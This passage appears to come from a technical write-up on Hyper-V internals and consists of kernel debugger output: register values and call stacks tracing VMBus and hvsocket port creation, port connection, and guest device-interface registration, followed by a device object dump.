<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000001</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rdx=0000000080000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">r8=000000000000002d</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">r9=0000000000000004</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"># Call Site</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00 winhvr!WinHvCreatePort</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">01 vmbusr!ParentClaimInterruptResources</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">02 vmbusr!XPartCreateInterrupt</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">03 vmbusr!ChpInitializeServerChannelLocked</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">04 vmbusr!ChOfferChannel</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">05 vmbusr!RootIoctlChannelOffered</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">06 vmbusr!RootIoctlDispatch</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">07 vmbusr!RootDeviceControl</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">…….WDFstuff</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">11 vmbusr!RootIoctlDeviceControlPreprocess</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">…….WDFstuff</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">16 vmbkmclr!KmclpSynchronousIoControl</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">17 vmbkmclr!KmclpServerOfferChannel</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">18 vmbkmclr!VmbChannelEnable</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">19 vmbusr!PipeStartChannel</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1a vmbusr!PipeOffer</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1b hvsocket!VmbusTlXPartRootSetupConnection</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1c hvsocket!VmbusTlSetupConnection</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1d hvsocket!VmbusTlXPartAcceptConnection</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1e hvsocket!VmbusTlListenerProcessPendingIncomingConnection</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1f hvsocket!VmbusTlProcessNewConnectionForListener</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">20 hvsocket!VmbusTlProcessNewConnection</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">21 hvsocket!VmbusTlProcessConnectRequestWorkItem</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">22 hvsocket!VmbusTlConnectRequestWorkQueueRoutine</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">23 NETIO!NetiopIoWorkItemRoutine</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">24 nt!IopProcessWorkItem</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">25 nt!ExpWorkerThread</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">26 nt!PspSystemThreadStartup</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">27 nt!KiStartSystemThread</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">And connection to it is carried out:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">********** Bp winhvr!WinHvConnectPort ********</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000004</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rdx=0000000080000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">r8=000000000001000c</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">r9=0000000000000001</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"># Call Site</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00 winhvr!WinHvConnectPort</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">01 vmbusr!ParentConnectDedicatedInterrupt</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">02 vmbusr!ParentClaimInterruptResources</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">03 vmbusr!XPartCreateInterrupt</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">04 vmbusr!ChpInitializeServerChannelLocked</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">05 vmbusr!ChOfferChannel</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">06 vmbusr!RootIoctlChannelOffered</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">07 vmbusr!RootIoctlDispatch</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">08 vmbusr!RootDeviceControl</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">………….WDFStuff</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">12 vmbusr!RootIoctlDeviceControlPreprocess</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">………….WDFStuff</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">17 vmbkmclr!KmclpSynchronousIoControl</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">18 vmbkmclr!KmclpServerOfferChannel</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">19 vmbkmclr!VmbChannelEnable</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1a vmbusr!PipeStartChannel</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1b vmbusr!PipeOffer</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1c hvsocket!VmbusTlXPartRootSetupConnection</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1d hvsocket!VmbusTlSetupConnection</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1e hvsocket!VmbusTlXPartAcceptConnection</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1f hvsocket!VmbusTlListenerProcessPendingIncomingConnection</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">20 hvsocket!VmbusTlProcessNewConnectionForListener</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">21 hvsocket!VmbusTlProcessNewConnection</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">22 hvsocket!VmbusTlProcessConnectRequestWorkItem</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">23 hvsocket!VmbusTlConnectRequestWorkQueueRoutine</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">24 NETIO!NetiopIoWorkItemRoutine</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">25 nt!IopProcessWorkItem</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">26 nt!ExpWorkerThread</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">27 nt!PspSystemThreadStartup</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">28 nt!KiStartSystemThread</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Then in guest OS nt!IoRegisterDeviceInterface is carried out:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"># Call Site</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00 nt!IoRegisterDeviceInterface</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">01 Wdf01000!Mx::MxRegisterDeviceInterface</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">02 Wdf01000!FxDeviceInterface::Register</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">03 Wdf01000!FxDeviceInterface::Register</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">04 Wdf01000!imp_WdfDeviceCreateDeviceInterface</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">05 vmbus!RootStartDeviceInterfaceByContext</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">06 hvsocket!VmbusTlXPartProcessNewConnection</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">07 vmbus!RootNotifyDeviceInterfaceArrival</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">08 Wdf01000!FxWorkItem::WorkItemHandler</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">09 Wdf01000!FxWorkItem::WorkItemThunk</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0a nt!IopProcessWorkItem</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0b nt!ExpWorkerThread</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0c nt!PspSystemThreadStartup</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0d nt!KiStartSystemThread</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">NTSTATUS IoRegisterDeviceInterface(</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ PDEVICE_OBJECT PhysicalDeviceObject,</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ </span><span style="background-color: transparent; color: blue; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">const</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> GUID *InterfaceClassGuid,</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_opt_ PUNICODE_STRING ReferenceString,</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _Out_ PUNICODE_STRING SymbolicLinkName</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">kd> !devobj @rcx</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Device object (ffffe38bf77145b0) is for:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> 00000013 \Driver\ACPI DriverObject ffffe38bf79d5a00</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Current Irp 00000000 RefCount 0 Type 00000032 Flags 00001040</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">SecurityDescriptor ffffa48e93c56dc0 DevExt ffffe38bf7a71c60 DevObjExt ffffe38bf7714700 DevNode ffffe38bf79d1c50 </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ExtensionFlags (0000000000) </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Characteristics (0x00000180) FILE_AUTOGENERATED_DEVICE_NAME, FILE_DEVICE_SECURE_OPEN</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">AttachedDevice (Upper) ffffe38bf7af5970 \Driver\vmbus</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Device queue is not busy.</span></div>
